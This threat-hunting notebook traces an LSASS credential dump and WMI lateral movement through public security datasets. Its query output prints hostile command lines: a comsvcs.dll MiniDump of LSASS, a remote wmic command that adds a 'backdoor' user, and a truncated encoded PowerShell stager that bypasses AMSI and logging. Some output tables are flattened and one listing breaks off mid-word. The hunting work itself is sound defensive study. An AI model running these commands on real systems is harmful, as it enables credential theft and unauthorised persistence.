# Outline
This document has two part:
- LSASS Memory Dump Huntbook - Adversary View
- Lateral movement via WMI

created by M11115824 and M11209305

# LSASS Memory Dump Huntbook - Adversary View

## Overview

This first part outlines the adversary perspective for hunting within an LSASS memory dump. It provides insights into potential artifacts and indicators of compromise (IOCs) that attackers might leave behind, aiding in forensic analysis and incident response efforts.

The LSASS process manages sensitive system credentials, making it a prime target for attackers. Key areas to focus on include:

* **Credentials:**
    * Hashed passwords (NTLM, Kerberos)
    * LSA Secrets (PKGs, Service Keys)
    * Session tickets (TGTs, Service Tickets)
    * In-memory authentication tokens (cached credentials)
* **Network Artifacts:**
    * Network connections (established sessions, DNS queries)
    * Remote procedure calls (RPCs)
    * Suspicious network traffic (exfiltration, lateral movement)
* **Process Activity:**
    * Loaded modules and DLLs
    * Open handles and file access
    * Injected code or suspicious threads
* **Registry and System Configuration:**
    * Modifications to LSA policies or security settings
    * Persistence mechanisms (scheduled tasks, registry startup entries)
    * Configuration changes for lateral movement or privilege escalation




Retrieve the LSASS (Local Security Authority Subsystem Service) process and conduct analysis on a memory dump from dataset.

In [46]:
lsass = get process 
from https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_lsass_memory_dump_comsvcs.zip 
where command_line like '%comsvcs%'

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*
lsass,process,1,70,124,140,198,135,12,48,124,124


Get the attribute of the process name like `Process ID`, `Process Name`, and `Command Line`  
The process id unique identifier assigned to each running process on a computer system (will changed every time machine booted up), in this query this id is only used for identifier from each execution

In [33]:
disp lsass attr pid, name, command_line, creator_user_ref.id

pid,name,command_line,creator_user_ref.id
4824,rundll32.exe,"""C:\Windows\System32\rundll32.exe"" C:\windows\System32\comsvcs.dll MiniDump 756 C:\Users\wardog\AppData\Local\Temp\lsass-comsvcs.dmp full",user-account--c8b6cbe8-e16c-5b03-948a-085d1333e43e


Find the parent process that create the malicious execution and display parent attributes like their children  
And from this result we know that the dumping execution is using powershell  
The powershell is used to utilize `rundll32.exe` to call minidump function of `comsvcs.dll`  
Also the `comsvcs.dll` function is used to dump **Local Security Authority Subsystem Service** `lsass-comsvcs.dmp` in order to retrieve credentials 

In [44]:
parents = find process created lsass
disp parents attr pid, name, command_line, creator_user_ref.id

pid 
 name 
 command_line 
 creator_user_ref.id 
 
 
 
 
 6100 
 powershell.exe 
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
 None 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 artifact* 
 directory* 
 file* 
 process* 
 user-account* 
 windows-registry-key* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 parents 
 process 
 1 
 57 
 122 
 136 
 194 
 131 
 10 
 48 
 122 
 122 
 
 
 *Number of related records cached.

Find the user that created the malicious execution and display the user

In [42]:
users = find user-account owned procs
disp users

user_id 
 id 
 
 
 
 
 WORKSTATION5\wardog 
 user-account--c8b6cbe8-e16c-5b03-948a-085d1333e43e 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 artifact* 
 directory* 
 file* 
 process* 
 user-account* 
 windows-registry-key* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 users 
 user-account 
 1 
 7 
 122 
 136 
 194 
 132 
 9 
 48 
 122 
 122 
 
 
 *Number of related records cached.

try to find the computer name that execute the malicious execution and display it

In [47]:
machines = find x-oca-asset linked procs
disp machines
events = find x-oca-event linked procs
disp events

hostname 
 id 
 
 
 
 
 WORKSTATION5 
 x-oca-asset--40bf1119-f018-56a0-a6a5-9bfeab2bc1df 
 
 
 
 
 
 
 module 
 provider 
 code 
 action 
 id 
 
 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 1 
 Process Create 
 x-oca-event--695b5685-9141-42ed-a46a-b67f42471c61 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 5 
 Process terminated 
 x-oca-event--af797548-a098-491a-bb80-cd72241fde9c 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--848ae047-0590-477a-b4a9-dc617ac8a5c5 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--eb196a58-40d5-4d78-a84c-fd6a6c88aded 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--d1bf355b-6ec6-48eb-bc4d-a5f5f8cff077 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--19ecfd0c-99e6-49b3-8a07-d019ce74e4a6 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--2772cc2a-ac9b-4316-843a-e15523b5b859 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 11 
 File created 
 x-oca-event--31a53318-d26a-461d-ba46-7126e65464b6 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--b236e27a-7f3f-43ef-8c1d-4099a72f8ef1 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--fcbca4ce-4b2e-498f-8f96-769796d9a443 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--9d47d151-5d42-45b7-a0a2-9c2f8f88f30f 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--67f25fd4-9951-44cb-aaf0-9f73a63f45d2 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--b940ddf1-2113-4ddf-be3d-43da8236df7f 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--3630ff3c-34f3-45b9-ac8e-627353cefa4a 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--bc21990e-f11e-46d4-aa3a-092630c64582 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--981bfe7f-0940-4d11-949f-cbb81df89224 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--3dc91926-3863-4dd2-917b-d7855cfcfeec 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--2c0f9c08-01f4-419d-a99f-94844de52955 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--e87544d6-038b-422b-8294-42ab67132307 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--002e4061-eab7-4008-926f-008123a8b67b 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--b028a5db-8fb9-4fd6-a1ac-61932d76ef03 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--6f8fb54c-e271-49fa-a8fc-1fa12fa26a2f 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--ca39e5f0-64a0-467d-9120-f055c12012a1 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--06f1a223-83f8-49ca-9d1c-9d58d0b988e1 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--6935132a-ec6f-4bc3-9c8c-e1326139003d 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--075b93b2-51d7-4e4a-b2f2-5966e875c358 
 
 
 Microsoft-Windows-Sysmon/Operational 
 Microsoft-Windows-Sysmon 
 7 
 Image loaded 
 x-oca-event--59487d9b-6eb0-4ef1-a57b-257dbc114e7c 
 
 
 Microsoft-Windows-Sysmon/Operati

# Lateral movement via WMI
## Overview
dataset:https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200914080546.html
techniques:https://attack.mitre.org/techniques/T1047/

This second part outlines the adversary abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads . An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement.

### Load the lateral movement dataset

In [ ]:
procs = GET process from https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip
 where command_line LIKE '%'

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*
procs,process,30,3393,3368,3582,4684,24,12,3413,83,1961,3368,3368


### Find wmic.exe
After the WMI connection has been initialized, a process can be remotely launched using the command: wmic /node:"" process call create "".<br> So, use "wmic.exe" to search some interesting. And we found someone wanted to add a backdoor.

In [ ]:
wmic = procs where command_line LIKE '%wmic%'
DISP wmic ATTR name, command_line

name 
 command_line 
 
 
 
 
 WMIC.exe 
 "C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add backdoor paw0rd1" 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 artifact* 
 directory* 
 file* 
 ipv4-addr* 
 network-traffic* 
 process* 
 user-account* 
 windows-registry-key* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 wmic 
 process 
 1 
 153 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 *Number of related records cached.

### Use "WmiPrvSE.exe" to find its child.
When the command line is executed, it has the parent process of C:\windows\system32\wbem\WmiPrvSE.exe. <br>
So, we tried to find process which mamed "WmiPrvSE.exe" and its child. 

In [ ]:
tasks= FIND process CREATED BY procs
WmiPrvSE= GET process FROM tasks WHERE [process:name = 'WmiPrvSE.exe']
WmiPrvSE_child= FIND process CREATED BY WmiPrvSE
DISP WmiPrvSE_child ATTR name, command_line

name 
 command_line 
 
 
 
 
 net.exe 
 net user /add backdoor paw0rd1 
 
 
 
 Block Executed in 19 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 artifact* 
 directory* 
 file* 
 ipv4-addr* 
 network-traffic* 
 process* 
 user-account* 
 windows-registry-key* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 tasks 
 process 
 25 
 4577 
 5659 
 6083 
 8246 
 48 
 24 
 5737 
 111 
 2895 
 5659 
 5659 
 
 
 WmiPrvSE 
 process 
 5 
 260 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 WmiPrvSE_child 
 process 
 1 
 66 
 5659 
 6083 
 8246 
 48 
 24 
 5761 
 111 
 2895 
 5659 
 5659 
 
 
 *Number of related records cached.

### Other keywords
Adversary may use command 'add' or 'create' to add backdoor, so we tried use these two keyword to search some interesting.

In [ ]:
add = procs where command_line LIKE '%add%'
DISP add

pid 
 x_unique_id 
 created 
 name 
 command_line 
 id 
 binary_ref.name 
 binary_ref.hashes.'SHA-1' 
 binary_ref.hashes.MD5 
 binary_ref.hashes.'SHA-256' 
 binary_ref.id 
 binary_ref.parent_directory_ref.path 
 binary_ref.parent_directory_ref.id 
 parent_ref.pid 
 parent_ref.x_unique_id 
 parent_ref.created 
 parent_ref.name 
 parent_ref.command_line 
 parent_ref.id 
 parent_ref.parent_ref.pid 
 parent_ref.parent_ref.x_unique_id 
 parent_ref.parent_ref.created 
 parent_ref.parent_ref.name 
 parent_ref.parent_ref.command_line 
 parent_ref.parent_ref.id 
 parent_ref.binary_ref.name 
 parent_ref.binary_ref.hashes.'SHA-1' 
 parent_ref.binary_ref.hashes.MD5 
 parent_ref.binary_ref.hashes.'SHA-256' 
 parent_ref.binary_ref.id 
 parent_ref.binary_ref.parent_directory_ref.path 
 parent_ref.binary_ref.parent_directory_ref.id 
 parent_ref.creator_user_ref.user_id 
 parent_ref.creator_user_ref.id 
 creator_user_ref.user_id 
 creator_user_ref.id 
 
 
 
 
 9428 
 {2d351099-5ca9-5f5f-2f04-000000000400} 
 2020-09-14T12:06:01.826Z 
 WMIC.exe 
 "C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add backdoor paw0rd1" 
 process--31687a03-f4a1-51ed-8c9a-f63dadb3fd56 
 WMIC.exe 
 None 
 None 
 None 
 file--47a4f8a8-1c11-57d2-83eb-bb04afd4b18b 
 C:\Windows\System32\wbem 
 directory--753f971e-a436-546f-afe3-92ea22a11650 
 9564 
 {2d351099-5bb3-5f5f-2004-000000000400} 
 None 
 powershell.exe 
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBJAE8ATgAuAE0AYQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJAAxADEAQgBEADgAPQBbAHIAZQBGAF0ALgBBAFMAcwBlAE0AYgBsAHkALgBHAGUAdABUAHkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBJAGUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAoACQAMQAxAEIAZAA4ACkAewAkAEEAMQA4AEUAMQA9ACQAMQAxAEIARAA4AC4ARwBlAHQAVgBhAEwAVQBFACgAJABuAFUAbABMACkAOwBJAGYAKAAkAEEAMQA4AGUAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkAEEAMQA4AGUAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABhADEAOABlADEAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJAB2AEEATAA9AFsAQwBvAEwAbABlAGMAdABpAE8ATgBTAC4ARwBlAE4ARQByAGkAQwAuAEQASQBjAFQAaQBPAG4AQQBSAFkAWwBTAHQAcgBJAE4ARwAsAFMAeQBzAFQARQBtAC4ATwBCAEoARQBjAHQAXQBdADoAOgBuAGUAVwAoACkAOwAkAHYAQQBMAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAQQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAYQAxADgAZQAxAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBsAH0ARQBMAHMARQB7AFsAUwBjAFIAaQBwAFQAQgBsAE8AQwBLAF0ALgAiAEcAZQBUAEYASQBFAGAATABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEAbABVAGUAKAAkAE4AdQBMAEwALAAoAE4ARQB3AC0ATwBCAGoAZQBDAHQAIABDAG8ATABMAEUAYwBUAGkATwBOAFMALgBHAGUATgBlAHIASQBjAC4ASABBAHMASABTAGUAdABbAFMAVAByAGkAbgBnAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAGYAXQAuAEEAcwBTAEUATQBCAGwAeQAuAEcAZQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBFAHQARgBJAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATAB1AGUAKAAkAE4AVQBMAGwALAAkAHQAUgBVAGUAKQA7AH0AOwBbAFMAWQBT

In [ ]:
create = procs where command_line LIKE '%create%'
DISP create ATTR name, command_line

name 
 command_line 
 
 
 
 
 WMIC.exe 
 "C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add backdoor paw0rd1" 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 artifact* 
 directory* 
 file* 
 ipv4-addr* 
 network-traffic* 
 process* 
 user-account* 
 windows-registry-key* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 create 
 process 
 1 
 153 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 *Number of related records cached.